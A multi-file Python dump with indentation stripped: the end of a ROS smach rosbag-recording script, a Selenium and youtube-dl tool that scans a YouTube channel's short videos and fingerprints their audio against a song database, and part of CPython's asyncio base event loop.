sm.userdata.rate = 100.0
sm.userdata.topic = ''
sm.userdata.point = Point()
sm.userdata.rate = 100.0
sm.userdata.topic = 'smacha/rosbag_cli_recording_1_point'
sm.userdata.file = '/tmp/rosbag_cli_recording_1.bag'
sm.userdata.topics = ['smacha/rosbag_cli_recording_1_point']
with sm:
smach.StateMachine.add('PUBLISH_MSG',
PublishMsgState('PUBLISH_MSG', msg_publisher, 'start'),
transitions={'aborted':'aborted',
'succeeded':'START_RECORDING'},
remapping={'msg':'point',
'rate':'rate',
'topic':'topic'})
smach.StateMachine.add('START_RECORDING',
RecordROSBagState('START_RECORDING', bag_recorder, 'start'),
transitions={'aborted':'aborted',
'succeeded':'WAIT'},
remapping={'file':'file',
'topics':'topics'})
smach.StateMachine.add('WAIT',
SleepState(5),
transitions={'succeeded':'STOP_RECORDING'})
smach.StateMachine.add('STOP_RECORDING',
RecordROSBagState('STOP_RECORDING', bag_recorder, 'stop_all'),
transitions={'aborted':'aborted',
'succeeded':'UNPUBLISH_MSG'})
smach.StateMachine.add('UNPUBLISH_MSG',
PublishMsgState('UNPUBLISH_MSG', msg_publisher, 'stop_all'),
transitions={'aborted':'aborted',
'succeeded':'succeeded'})
outcome = sm.execute()
if __name__ == '__main__':
main() |
find_stable.py | import argparse #for getting command line arguments
import os #for various things
from selenium import webdriver, common #for getting html source of channel
from time import sleep #to prevent errors
import re
import bs4 as bs #for working with html source file
import subprocess #calling other script or executables from this file
import sys
from termcolor import * #for getting colored text
import colorama
### initialise colored text
colorama.init()
from libs.db_sqlite import SqliteDatabase #for working with the SQL database
from recognize_from_file import run_recognition
from libs.utils import align_matches
import math
import datetime # To include time info in the missed.txt file
from datetime import datetime, time, date
import time as tm # for getting script runtime
import threading
#import multiprocessing
### vars for script runtime and missed.txt time
now = datetime.now()
currentTime = time(now.hour, now.minute, now.second)
currentDate = date(now.year, now.month, now.day)
start_time = tm.time()
print("""
Welcome to...
__ _______ ________ ___ _____ ______ _ _
\ \ / /_ _| |_ _| \/ |/ ___| | ___(_) | |
\ V / | | | | | . . |\ `--. | |_ _ _ __ __| | ___ _ __
\ / | | | | | |\/| | `--. \ | _| | | '_ \ / _` |/ _ \ '__|
| | | | | | | | | |/\__/ / | | | | | | | (_| | __/ |
\_/ \_/ \_/ \_| |_/\____/ \_| |_|_| |_|\__,_|\___|_|
Enter a channel URL to begin.
Example URL: https://www.youtube.com/channel/UCmSynKP6bHIlBqzBDpCeQPA/videos
""")
class Finder:
def __init__(self):
### Verifying needed folders
if not os.path.isdir("downloaded_mp3s"):
os.mkdir("downloaded_mp3s")
### setting variables
self.arguments = get_arguments()
self.sql = SqliteDatabase()
assert 3 - [self.arguments.id, self.arguments.restore_file, self.arguments.channel_url].count(None) <= 1 , "Can't have any of the ID, channel, or restore file as combined arguments."
# if there is no url or id, ask for url
if (self.arguments.id is None and self.arguments.channel_url is None and self.arguments.restore_file is None):
self.arguments.channel_url = input("URL: ") #Example input: www.youtube.com/c/GlitchxCity/featured
# if there is a url, verify if it's a correct URL
if self.arguments.channel_url is not None:
self.verify_url(self.arguments.channel_url)
self.ignore_checked = self.arguments.ignore
self.verbose = self.arguments.verbose
self.speedmode = self.arguments.speedmode
self.vprint(str(self.arguments), "yellow")
### Make sure that there are no leftovers from previous runs
self.delete_mp3s()
def verify_url(self, url):
### Check if the channel url is in right format
expr_channel = r"^.*(/c(hannel)?/[a-zA-Z0-9-_]+)"
expr_user = r"^.*(/u(ser)?/[a-zA-Z0-9-_]+)"
channel_path_match = re.match(expr_channel, url)
user_path_match = re.match(expr_user, url)
if channel_path_match is None and user_path_match is None:
self.arguments.channel_url = input("The URL you entered is invalid. Please enter a valid URL: ")
elif channel_path_match is not None:
channel_path = channel_path_match.groups()[0]
self.channel_url = "https://www.youtube.com" + channel_path + "/videos"
else:
channel_path = user_path_match.groups()[0]
self.channel_url = "https://www.youtube.com" + channel_path + "/videos"
return True
def vprint(self, text: str, colour:str = "white"):
"""
Helpful function for printing when verbose is turned on
"""
if self.verbose:
cprint(text, colour)
def get_song_mp3(self, id: str) -> str:
"""
Downloads the audio from a youtube video in mp3 format given a video id.
"""
### Delete existing mp3 files in downloaded_mp3s directory in case there is one left of a previous run
#self.delete_mp3s()
url = "https://youtube.com/watch?v=" + id
dir_here = os.path.abspath(os.getcwd())
dir_youtube_dl_dir = os.path.join(dir_here, "youtube-dl")
### Set youtube-dl exectuable for windows and linux users
if sys.platform == "win32":
youtube_dl_exec = "youtube-dl.exe"
else:
youtube_dl_exec = "youtube-dl"
path_youtube_dl_exec = os.path.join(dir_youtube_dl_dir, youtube_dl_exec)
### initialise this variable to make the destination argument for the youtube-dl command
dir_downloaded_mp3s = os.path.join(dir_here, "downloaded_mp3s")
### '%(title)s.%(ext)s' comes from how youtube-dl.exe outputs files with
### filename as youtube title
#destination_arg = os.path.join(dir_downloaded_mp3s, "%(title)s.%(ext)s")
destination_arg = os.path.join(dir_downloaded_mp3s, f"{id}.%(ext)s")
### Make the mp3 folder which will contain a downloaded mp3
if not os.path.isdir(dir_downloaded_mp3s):
os.mkdir(dir_downloaded_mp3s)
### Setting up the command for the different modes
if not self.speedmode:
cmd = [
f"{path_youtube_dl_exec}", "-x", "--audio-format", "mp3",
"--no-warnings", "-o", f"{destination_arg}", f"{url}"
]
else:
cmd = [f"{path_youtube_dl_exec}", "-x", "--postprocessor-args", "\"-ss 00:00:00.00 -t 00:00:15.00\"", f"{url}", "--audio-format", "mp3", "-o", f"{destination_arg}"]
try:
subprocess.check_output(' '.join(cmd))
sleep(0.1)
self.vprint(f"Audio downloaded! Performing fingerprint match scan...")
except KeyboardInterrupt:
### completely exit program if this is what user wants
self.delete_mp3s()
exit()
except:
### always show error even when verbose is off
cprint("Video audio couldn't be downloaded. Skipping for now. Please check missed.txt for more info.", "red")
with open("missed.txt", "a") as f:
f.write(f"{currentDate} {currentTime}: Could not check video with ID {id}. Please copy and paste this URL in your browser to check: 'youtube.com/watch?v={id}'\n")
### when return value is None, we go to the next song to check (see code in line 326)
return None
### Even though this may not be the best way to do it, this does support greek letters on both Windows and Linux
return os.path.abspath(os.path.join("downloaded_mp3s", os.listdir("downloaded_mp3s")[0]))
def delete_mp3s(self):
"""
Deletes all mp3s in the mp3s folder.
"""
current_directory = os.getcwd()
for file in os.listdir("downloaded_mp3s"):
full_path = os.path.join(current_directory, "downloaded_mp3s", file)
os.remove(full_path)
def get_channel_source(self):
### if a restore file is supplied, use that instead
if self.arguments.restore_file is not None:
with open(self.arguments.restore_file) as f:
source = f.read()
return source
### Open a browser and catch chromedriver not found error
try:
driver = webdriver.Chrome()
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
except common.exceptions.WebDriverException:
try:
driver = webdriver.Chrome(executable_path = r"C:\ProgramData\chocolatey\bin\chromedriver.exe")
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
except:
print("If you see this message, that means selenium can't find 'chromedriver.exe.'")
print("To fix this, search for 'chromedriver.exe' on your file system.")
print(r"Example of 'chromedriver.exe' path: 'C:\ProgramData\chocolatey\bin\chromedriver.exe'")
location = input("Once you've found 'chromedriver.exe', paste the location to it here: ")
driver = webdriver.Chrome(executable_path = location)
print("Alternatively, you can put it in the code yourself so you don't have to constantly fill this in.")
print("To do that, in the file 'find_stable.py', search for the line \"driver = webdriver.Chrome()\" and in between the brackets put:")
print("executable_path = (your chromedriver location)")
driver.get(self.channel_url)
sleep(2)
source = driver.page_source
### Keep scrolling until we hit the end of the page
scroll_by = 5000
driver.execute_script(f"window.scrollBy(0, {scroll_by});")
while driver.page_source != source:
source = driver.page_source
driver.execute_script(f"window.scrollBy(0, {scroll_by});")
sleep(0.1)
driver.quit()
with open("restore_file.html", "w") as f:
f.write(source.encode('utf-8').decode('ascii','ignore'))
return source
def check_file(self, fpath, thresh=20):
"""
Fingerprint and try to match a song against database
"""
### Getting ID from filepath, Might just supply ID as argument
base = os.path.basename(fpath)
id_, _ = os.path.splitext(base)
matches = run_recognition(fpath)
song = align_matches(self.sql, matches)
confidence = song['CONFIDENCE']
self.vprint(f"Confidence of a match: {confidence}.", "yellow")
### If there's an exact match, give feedback to user, otherwise if there's a possible match notify the user as well
if confidence >= 400:
self.vprint(f"EXACT MATCH FOUND FOR ID: {id_}", "green")
with open("MATCHES.txt", "a") as f:
f.write(f"{currentDate} {currentTime}: You've found an identical match with the database. Video with ID {id_} is an EXACT match, with a confidence of {confidence}!!\n")
elif confidence >= thresh:
self.vprint(f"POSSIBLE MATCH FOUND FOR ID: {id_}", "green")
with open("MATCHES.txt", "a") as f:
f.write(f"{currentDate} {currentTime}: Video with YT ID {id_} has a possible match with the database, with a confidence of {confidence}! Check it out!\n")
return confidence >= thresh
def get_videos(self, source):
"""
Extract video ids and durations from channel video page source
"""
### get video ids form page source.
watch_expr = r'href="/watch\?v=([a-zA-Z0-9_-]+)"'
matches = re.finditer(watch_expr, source)
### For each video, the id is put twice in the page source,
### so we have to use [::2] to grab only half of the ids
video_ids = [match.groups()[0] for match in matches][::2]
### Get duration of video corresponding to each video id.
soup = bs.BeautifulSoup(source, "html.parser")
### all time durations are contained within a tag with class
### "style-scope ytd-thumbnail-overlay-time-status-renderer"
time_spans = soup.findAll(
"span",
{"class": "style-scope ytd-thumbnail-overlay-time-status-renderer"}
)
raw_durations = [ts.text.strip() for ts in time_spans]
del time_spans
### Making video durations list
durations = []
for raw_duration in raw_durations:
time_units = raw_duration.split(":")
seconds = int(time_units[-1])
minutes = int(time_units[-2])
hours = int(time_units[-3]) if len(time_units) > 2 else 0
### Get total duration in seconds.
duration = seconds + (minutes * 60) + (hours * 3600)
durations.append(duration)
# Construct and return a list of videos, where each video is a dict
# containing the video id and video duration in seconds.
videos = []
for (video_id, duration) in zip(video_ids, durations):
videos.append(
{
"id" : video_id,
"duration" : duration
}
)
return videos
'''We may need to add also the video titles if we want to include a speedmode but for now this will do.'''
def check_one_video(self, id_):
song_fpath = self.get_song_mp3(id_)
if song_fpath is None:
return
possible_match = self.check_file(song_fpath, )
if possible_match:
song_fname = os.path.split(song_fpath)[1]
with open("MATCHES.txt", "a") as f:
f.write(f"{currentDate} {currentTime}: {song_fname} with YT ID {id_} has a possible match with the database! Check it out!\n")
else:
self.vprint("Probably not a match.")
def check_channel(self, max_duration=210):
#Get the HTML source of the channel's video section
source = self.get_channel_source()
videos = self.get_videos(source)
target_videos = []
for video in videos:
### this seems like complicated logic but it's exactly what we want,
### please fill in "(p^~q) or (p ^ (q^ (~r)))" on the website
### https://web.stanford.edu/class/cs103/tools/truth-table-tool/ to see for yourself
if ((self.ignore_checked == False and video["duration"] <=max_duration)
or
(video["duration"]<= max_duration and (self.ignore_checked == True and not self.sql.in_checked_ids(video["id"])))):
target_videos.append(video)
### Get total number of videos to display progress percentage
total_videos = len(target_videos)
if total_videos == 0: self.vprint("All videos have been checked or are longer than than the maximum duration.","green"), exit()
### We use two indexes, both for a different purpose, _ is for progress percentage, 'index' is for getting correct slices of target_videos (so multithreading purposes)
_ = 0
for index in range(round(len(target_videos)/self.arguments.threads)):
section = target_videos[self.arguments.threads*index : self.arguments.threads*(index+1)]
### Downloading mp3 with multithreading
jobs = []
for video in section:
id_ = video["id"]
try:
thread = threading.Thread(target=self.get_song_mp3, args=(id_,))
except KeyboardInterrupt:
self.delete_mp3s
exit()
jobs.append(thread)
self.vprint("Downloading audio from video with ID {id}...")
for job in jobs:
_ += 1
job.start()
for job in jobs:
job.join()
### Fingerprinting with multithreading
jobs = []
for file in os.listdir("downloaded_mp3s"):
p = threading.Thread(target=self.check_file, args=(os.path.join("downloaded_mp3s", file), self.arguments.threshold, ))
filename, file_extension = os.path.splitext(file)
self.sql.add_checked_id(filename)
jobs.append(p)
for job in jobs:
job.start()
for job in jobs:
job.join()
self.vprint(f"{100*(_)/total_videos:.2f}% done")
self.delete_mp3s()
print("")
self.delete_mp3s()
def main(self):
if self.arguments.id is not None:
self.check_one_video(self.arguments.id)
else:
self.check_channel()
self.vprint(f"Duration of channel scan in seconds: {tm.time() - start_time}")
def get_arguments():
parser = argparse.ArgumentParser(description='''TMS-Finder''')
parser.add_argument("-i", "--ignore", dest = "ignore", default=False, help="Ignore already checked videos", action='store_true')
parser.add_argument("-s", "--speedmode", dest = "speedmode", help="Activate speed mode", action = "store_true")
parser.add_argument("-v", "--verbose", dest = "verbose", help="Give Feedback, default = True", action = "store_true", default = True)
parser.add_argument("-t", "--threshold", dest = "threshold", action="store", type = int, help = "Set the threshold for the number of hash matches at which you are notified of a match, default is 20", default = 20)
parser.add_argument("-m", "--multi-threading", dest="threads", action="store",type=int, help="Amount of videos allowed to concurrently check, default is 1", default=1)
parser.add_argument("-c", "--channel", dest = "channel_url", help="Parse the channel url as command line argument")
parser.add_argument("-id" ,"--id", dest = "id", help = "Test a single video instead of a whole YT channel.")
parser.add_argument("-r", "--restore-file", dest = "restore_file", help="Give a restore file to get the html source of a channel without opening the browser again")
return parser.parse_args()
if __name__ == '__main__':
finder = Finder()
finder.main() |
base_events.py | """Base implementation of event loop.
The event loop can be broken up into a multiplexer (the part
responsible for notifying us of I/O events) and the event loop proper,
which wraps a multiplexer with functionality for scheduling callbacks,
immediately or at a given time in the future.
Whenever a public API takes a callback, subsequent positional
arguments will be passed to the callback if/when it is called. This
avoids the proliferation of trivial lambdas implementing closures.
Keyword arguments for the callback are not supported; this is a
conscious design decision, leaving the door open for keyword arguments
to modify the meaning of the API call itself.
"""
import collections
import collections.abc
import concurrent.futures
import functools
import heapq
import itertools
import os
import socket
import stat
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import constants
from . import coroutines
from . import events
from . import exceptions
from . import futures
from . import protocols
from . import sslproto
from . import staggered
from . import tasks
from . import transports
from . import trsock
from .log import logger
__all__ = 'BaseEventLoop',
# Minimum number of _scheduled timer handles before cleanup of
# cancelled handles is performed.
_MIN_SCHEDULED_TIMER_HANDLES = 100
# Minimum fraction of _scheduled timer handles that are cancelled
# before cleanup of cancelled handles is performed.
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
# Maximum timeout passed to select to avoid OS limitations
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
# Used for deprecation and removal of `loop.create_datagram_endpoint()`'s
# *reuse_address* parameter
_unset = object()
def _format_handle(handle):
cb = handle._callback
if isinstance(getattr(cb, '__self__', None), tasks.Task):
# format the task
return repr(cb.__self__)
else:
return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
# Try to skip getaddrinfo if "host" is already an IP. Users might have
# handled name resolution in their own code and pass in resolved IPs.
if not hasattr(socket, 'inet_pton'):
return
if proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP} or \
host is None:
return None
if type == socket.SOCK_STREAM:
proto = socket.IPPROTO_TCP
elif type == socket.SOCK_DGRAM:
proto = socket.IPPROTO_UDP
else:
return None
if port is None:
port = 0
elif isinstance(port, bytes) and port == b'':
port = 0
elif isinstance(port, str) and port == '':
port = 0
else:
# If port's a service name like "http", don't skip getaddrinfo.
try:
port = int(port)
except (TypeError, ValueError):
return None
if family == socket.AF_UNSPEC:
afs = [socket.AF_INET]
if _HAS_IPv6:
afs.append(socket.AF_INET6)
else:
afs = [family]
if isinstance(host, bytes):
host = host.decode('idna')
if '%' in host:
# Linux's inet_pton doesn't accept an IPv6 zone index after host,
# like '::1%lo0'.
return None
for af in afs:
try:
socket.inet_pton(af, host)
# The host has already been resolved.
if _HAS_IPv6 and af == socket.AF_INET6:
return af, type, proto, '', (host, port, flowinfo, scopeid)
else:
return af, type, proto, '', (host, port)
except OSError:
pass
# "host" is not an IP address.
return None
def _interleave_addrinfos(addrinfos, first_address_family_count=1):
"""Interleave list of addrinfo tuples by family."""
# Group addresses by family
addrinfos_by_family = collections.OrderedDict()
for addr in addrinfos:
family = addr[0]
if family not in addrinfos_by_family:
addrinfos_by_family[family] = []
addrinfos_by_family[family].append(addr)
addrinfos_lists = list(addrinfos_by_family.values())
reordered = []
if first_address_family_count > 1:
reordered.extend(addrinfos_lists[0][:first_address_family_count - 1])
del addrinfos_lists[0][:first_address_family_count - 1]
reordered.extend(
a for a in itertools.chain.from_iterable(
itertools.zip_longest(*addrinfos_lists)
) if a is not None)
return reordered
def _run_until_complete_cb(fut):
if not fut.cancelled():
exc = fut.exception()
if isinstance(exc, (SystemExit, KeyboardInterrupt)):
# Issue #22429: run_forever() already finished, no need to
# stop it.
return
futures._get_loop(fut).stop()
if hasattr(socket, 'TCP_NODELAY'):
def _set_nodelay(sock):
if (sock.family in {socket.AF_INET, socket.AF_INET6} and
sock.type == socket.SOCK_STREAM and
sock.proto == socket.IPPROTO_TCP):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
def _set_nodelay(sock):
pass
def _check_ssl_socket(sock):
if ssl is not None and isinstance(sock, ssl.SSLSocket):
raise TypeError("Socket cannot be of type SSLSocket")
class _SendfileFallbackProtocol(protocols.Protocol):
def __init__(self, transp):
if not isinstance(transp, transports._FlowControlMixin):
raise TypeError("transport should be _FlowControlMixin instance")
self._transport = transp
self._proto = transp.get_protocol()
self._should_resume_reading = transp.is_reading()
self._should_resume_writing = transp._protocol_paused
transp.pause_reading()
transp.set_protocol(self)
if self._should_resume_writing:
self._write_ready_fut = self._transport._loop.create_future()
else:
self._write_ready_fut = None
async def drain(self):
if self._transport.is_closing():
raise ConnectionError("Connection closed by peer")
fut = self._write_ready_fut
if fut is None:
return
await fut
def connection_made(self, transport):
raise RuntimeError("Invalid state: "
"connection should have been established already.")
def connection_lost(self, exc):
if self._write_ready_fut is not None:
# Never happens if peer disconnects after sending the whole content
# Thus disconnection is always an exception from user perspective
if exc is None:
self._write_ready_fut.set_exception(
ConnectionError("Connection is closed by peer"))
else:
self._write_ready_fut.set_exception(exc)
self._proto.connection_lost(exc)
def pause_writing(self):
if self._write_ready_fut is not None:
return
self._write_ready_fut = self._transport._loop.create_future()
def resume_writing(self):
if self._write_ready_fut is None:
return
self._write_ready_fut.set_result(False)
self._write_ready_fut = None
def data_received(self, data):
raise RuntimeError("Invalid state: reading should be paused")
def eof_received(self):
raise RuntimeError("Invalid state: reading should be paused")
async def restore(self):
self._transport.set_protocol(self._proto)
if self._should_resume_reading:
self._transport.resume_reading()
if self._write_ready_fut is not None:
# Cancel the future.
# Basically it has no effect because protocol is switched back,
# no code should wait for it anymore.
self._write_ready_fut.cancel()
if self._should_resume_writing:
self._proto.resume_writing()
class Server(events.AbstractServer):
def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
ssl_handshake_timeout):
self._loop = loop
self._sockets = sockets
self._active_count = 0
self._waiters = []
self._protocol_factory = protocol_factory
self._backlog = backlog
self._ssl_context = ssl_context
self._ssl_handshake_timeout = ssl_handshake_timeout
self._serving = False
self._serving_forever_fut = None
def __repr__(self):
return f'<{self.__class__.__name__} sockets={self.sockets!r}>'
def _attach(self):
assert self._sockets is not None
self._active_count += 1
def _detach(self):
assert self._active_count > 0
self._active_count -= 1
if self._active_count == 0 and self._sockets is None:
self._wakeup()
def _wakeup(self):
waiters = self._waiters
self._waiters = None
for waiter in waiters:
if not waiter.done():
waiter.set_result(waiter)
def _start_serving(self):
if self._serving:
return
self._serving = True
for sock in self._sockets:
sock.listen(self._backlog)
self._loop._start_serving(
self._protocol_factory, sock, self._ssl_context,
self, self._backlog, self._ssl_handshake_timeout)
def get_loop(self):
return self._loop
def is_serving(self):
return self._serving
@property
def sockets(self):
if self._sockets is None:
return ()
return tuple(trsock.TransportSocket(s) for s in self._sockets)
def close(self):
sockets = self._sockets
if sockets is None:
return
self._sockets = None
for sock in sockets:
self._loop._stop_serving(sock)
self._serving = False
if (self._serving_forever_fut is not None and
not self._serving_forever_fut.done()):
self._serving_forever_fut.cancel()
self._serving_forever_fut = None
if self._active_count == 0:
self._wakeup()
async def start_serving(self):
self._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0)
async def serve_forever(self):
if self._serving_forever_fut is not None:
raise RuntimeError(
f'server {self!r} is already being awaited on serve_forever()')
if self._sockets is None:
raise RuntimeError(f'server {self!r} is closed')
self._start_serving()
self._serving_forever_fut = self._loop.create_future()
try:
await self._serving_forever_fut
except exceptions.CancelledError:
try:
self.close()
await self.wait_closed()
finally:
raise
finally:
self._serving_forever_fut = None
async def wait_closed(self):
if self._sockets is None or self._waiters is None:
return
waiter = self._loop.create_future()
self._waiters.append(waiter)
await waiter
class BaseEventLoop(events.AbstractEventLoop):
def __init__(self):
self._timer_cancelled_count = 0
self._closed = False
self._stopping = False
self._ready = collections.deque()
self._scheduled = []
self._default_executor = None
self._internal_fds = 0
# Identifier of the thread running the event loop, or None if the
# event loop is not running
self._thread_id = None
self._clock_resolution = time.get_clock_info('monotonic').resolution
self._exception_handler = None
self.set_debug(coroutines._is_debug_mode())
# In debug mode, if the execution of a callback or a step of a task
# exceed this duration in seconds, the slow callback/task is logged.
self.slow_callback_duration = 0.1
self._current_handle = None
self._task_factory = None
self._coroutine_origin_tracking_enabled = False
self._coroutine_origin_tracking_saved_depth = None
# A weak set of all asynchronous generators that are
# being iterated by the loop.
self._asyncgens = weakref.WeakSet()
# Set to True when `loop.shutdown_asyncgens` is called.
self._asyncgens_shutdown_called = False
# Set to True when `loop.shutdown_default_executor` is called.
self._executor_shutdown_called = False
def __repr__(self):
return (
f'<{self.__class__.__name__} running={self.is_running()} '
f'closed={self.is_closed()} debug={self.get_debug()}>'
)
def create_future(self):
"""Create a Future object attached to the loop."""
return futures.Future(loop=self)
def create_task(self, coro, *, name=None):
"""Schedule a coroutine object.
Return a task object.
"""
self._check_closed()
if self._task_factory is None:
task = tasks.Task(coro, loop=self, name=name)
if task._source_traceback:
del task._source_traceback[-1]
else:
task = self._task_factory(self, coro)
tasks._set_task_name(task, name)
return task
def set_task_factory(self, factory):
"""Set a task factory that will be used by loop.create_task().
If factory is None the default task factory will be set.
If factory is a callable, it should have a signature matching
'(loop, coro)', where 'loop' will be a reference to the active
event loop, 'coro' will be a coroutine object. The callable
must return a Future.
"""
if factory is not None and not callable(factory):
raise TypeError('task factory must be a callable or None')
self._task_factory = factory
def get_task_factory(self):
"""Return a task factory, or None if the default one is in use."""
return self._task_factory
def _make_socket_transport(self, sock, protocol, waiter=None, *,
extra=None, server=None):
"""Create socket transport."""
raise NotImplementedError
def _make_ssl_transport(
self, rawsock, protocol, sslcontext, waiter=None,
*, server_side=False, server_hostname=None,
extra=None, server=None,
ssl_handshake_timeout=None,
call_connection_made=True):
"""Create SSL transport."""
raise NotImplementedError
def _make_datagram_transport(self, sock, protocol,
address=None, waiter=None, extra=None):
"""Create datagram transport."""
raise NotImplementedError
def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create read pipe transport."""
raise NotImplementedError
def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create write pipe transport."""
raise NotImplementedError
async def _make_subprocess_transport(self, protocol, args, shell,
stdin, stdout, stderr, bufsize,
extra=None, **kwargs):
"""Create subprocess transport."""
raise NotImplementedError
def _write_to_self(self):
"""Write a byte to self-pipe, to wake up the event loop.
This may be called from a different thread.
The subclass is responsible for implementing the self-pipe.
"""
raise NotImplementedError
def _process_events(self, event_list):
"""Process selector events."""
raise NotImplementedError
def _check_closed(self):
if self._closed:
raise RuntimeError('Event loop is closed')
def _check_default_executor(self):
if self._executor_shutdown_called:
raise RuntimeError('Executor shutdown has been called')
def _asyncgen_finalizer_hook(self, agen):
self._asyncgens.discard(agen)
if not self.is_closed():
self.call_soon_threadsafe(self.create_task, agen.aclose())
def _asyncgen_firstiter_hook(self, agen):
if self._asyncgens_shutdown_called:
warnings.warn(
f"asynchronous generator {agen!r} was scheduled after "
f"loop.shutdown_asyncgens() call",
ResourceWarning, source=self)
self._asyncgens.add(agen)
async def shutdown_asyncgens(self):
"""Shutdown all active asynchronous generators."""
self._asyncgens_shutdown_called = True
if not len(self._asyncgens):
# If Python version is <3.6 or we don't have any asynchronous
# generators alive.
return
closing_agens = list(self._asyncgens)
self._asyncgens.clear()
results = await tasks._gather(
*[ag.aclose() for ag in closing_agens],
return_exceptions=True,
loop=self)
for result, agen in zip(results, closing_agens):
if isinstance(result, Exception):
self.call_exception_handler({
'message': f'an error occurred during closing of '
f'asynchronous generator {agen!r}',
'exception': result,
'asyncgen': agen
})
async def shutdown_default_executor(self):
"""Schedule the shutdown of the default executor."""
self._executor_shutdown_called = True
if self._default_executor is None:
return
future = self.create_future()
thread = threading.Thread(target=self._do_shutdown, args=(future,))
thread.start()
try:
await future
finally:
thread.join()
def _do_shutdown(self, future):
try:
self._default_executor.shutdown(wait=True)
self.call_soon_threadsafe(future.set_result, None)
except Exception as ex:
self.call_soon_threadsafe(future.set_exception, ex)
def _check_running(self):
if self.is_running():
raise RuntimeError('This event loop is already running')
if events._get_running_loop() is not None:
raise RuntimeError(
'Cannot run the event loop while another loop is running')
def run_forever(self):
"""Run until stop() is called."""
self._check_closed()
self._check_running()
self._set_coroutine_origin_tracking(self._debug)
self._thread_id = threading.get_ident()
old_agen_hooks = sys.get_asyncgen_hooks()
sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
finalizer=self._asyncgen_finalizer_hook)
try:
events._set_running_loop(self)
while True:
self._run_once()
if self._stopping:
break
finally:
self._stopping = False
self._thread_id = None
events._set_running_loop(None)
self._set_coroutine_origin_tracking(False)
sys.set_asyncgen_hooks(*old_agen_hooks)
def run_until_complete(self, future):
"""Run until the Future is done.
If the argument is a coroutine, it is wrapped in a Task.
WARNING: It would be disastrous to call run_until_complete()
with the same coroutine twice -- it would wrap it in two
different Tasks and that can't be good.
Return the Future's result, or raise its exception.
"""
self._check_closed()
self._check_running()
new_task = not futures.isfuture(future)
future = tasks.ensure_future(future, loop=self)
if new_task:
# An exception is raised if the future didn't complete, so there
# is no need to log the "destroy pending task" message
future._log_destroy_pending = False
future.add_done_callback(_run_until_complete_cb)
try:
self.run_forever()
except:
if new_task and future.done() and not future.cancelled():
# The coroutine raised a BaseException. Consume the exception
# to not log a warning, the caller doesn't have access to the
# local task.
future.exception()
raise
finally:
future.remove_done_callback(_run_until_complete_cb)
if not future.done():
raise RuntimeError('Event loop stopped before Future completed.')
return future.result()
def stop(self):
"""Stop running the event loop.
Every callback already scheduled will still run. This simply informs
run_forever to stop looping after a complete iteration.
"""
self._stopping = True
def close(self):
"""Close the event loop.
This clears the queues and shuts down the executor,
but does not wait for the executor to finish.
The event loop must not be running.
"""
if self.is_running():
raise RuntimeError("Cannot close a running event loop")
if self._closed:
return
if self._debug:
logger.debug("Close %r", self)
self._closed = True
self._ready.clear()
self._scheduled.clear()
self._executor_shutdown_called = True
executor = self._default_executor
if executor is not None:
self._default_executor = None
executor.shutdown(wait=False)
def is_closed(self):
"""Returns True if the event loop was closed."""
return self._closed
def __del__(self, _warn=warnings.warn):
if not self.is_closed():
_warn(f"unclosed event loop {self!r}", ResourceWarning, source=self)
if not self.is_running():
self.close()
def is_running(self):
"""Returns True if the event loop is running."""
return (self._thread_id is not None)
def time(self):
"""Return the time according to the event loop's clock.
This is a float expressed in seconds since an epoch, but the
epoch, precision, accuracy and drift are unspecified and may
differ per event loop.
"""
return time.monotonic()
def call_later(self, delay, callback, *args, context=None):
"""Arrange for a callback to be called at a given time.
Return a Handle: an opaque object with a cancel() method that
can be used to cancel the call.
The delay can be an int or float, expressed in seconds. It is
always relative to the current time.
Each callback will be called exactly once. If two callbacks
are scheduled for exactly the same time, it undefined which
will be called first.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
timer = self.call_at(self.time() + delay, callback, *args,
context=context)
if timer._source_traceback:
del timer._source_traceback[-1]
return timer
def call_at(self, when, callback, *args, context=None):
"""Like call_later(), but uses an absolute time.
Absolute time corresponds to the event loop's time() method.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_at')
timer = events.TimerHandle(when, callback, args, self, context)
if timer._source_traceback:
del timer._source_traceback[-1]
heapq.heappush(self._scheduled, timer)
timer._scheduled = True
return timer
def call_soon(self, callback, *args, context=None):
"""Arrange for a callback to be called as soon as possible.
This operates as a FIFO queue: callbacks are called in the
order in which they are registered. Each callback will be
called exactly once.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_soon')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
return handle
def _check_callback(self, callback, method):
if (coroutines.iscoroutine(callback) or
coroutines.iscoroutinefunction(callback)):
raise TypeError(
f"coroutines cannot be used with {method}()")
if not callable(callback):
raise TypeError(
f'a callable object was expected by {method}(), '
f'got {callback!r}')
def _call_soon(self, callback, args, context):
handle = events.Handle(callback, args, self, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._ready.append(handle)
return handle
def _check_thread(self):
"""Check that the current thread is the thread running the event loop.
Non-thread-safe methods of this class make this assumption and will
likely behave incorrectly when the assumption is violated.
Should only be called when (self._debug == True). The caller is
